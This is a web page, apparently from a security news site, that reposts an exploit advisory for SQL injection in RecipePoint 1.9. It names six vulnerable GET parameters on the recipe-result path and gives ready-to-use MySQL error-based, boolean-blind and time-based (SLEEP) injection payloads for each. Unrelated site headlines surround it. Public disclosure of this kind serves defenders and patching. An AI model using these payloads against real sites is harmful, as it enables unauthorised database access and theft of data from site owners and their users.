Home Tools Exploits & CVE's RecipePoint 1.9 SQL Injection

RecipePoint 1.9 SQL Injection

July 18, 2023

201

Authored by CraCkEr

RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.

# Exploit Title: RecipePoint 1.9 - SQL Injection
# Exploit Author: CraCkEr
# Date: 15/07/2023
# Vendor: phpscriptpoint
# Vendor Homepage: https://phpscriptpoint.com/
# Software Link: https://demo.phpscriptpoint.com/recipepoint/
# Tested on: Windows 10 Pro
# Impact: Database Access



## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.



Path: /recipepoint/recipe-result

GET parameter 'text' is vulnerable to SQL Injection
GET parameter 'category' is vulnerable to SQL Injection
GET parameter 'type' is vulnerable to SQL Injection
GET parameter 'difficulty' is vulnerable to SQL Injection
GET parameter 'cuisine' is vulnerable to SQL Injection
GET parameter 'cooking_method' is vulnerable to SQL Injection


https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]


---
Parameter: text (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: type (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: difficulty (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1

Parameter: cuisine (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1

Parameter: cooking_method (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)
---



[-] Done

RecipePoint 1.9 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

FBI: Fraudsters using fake online dating verification apps to scam lovers

Know-your-customer executive order facing stiff opposition from cloud industry

Congress picked a direct fight with ByteDance and TikTok. The privacy...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Packet Storm New Exploits For January, 2023

flatCore CMS XSS / File Disclosure / SQL Injection

Coursemat Multi-Tenant Course Selling Website 1.1 Cross Site Scripting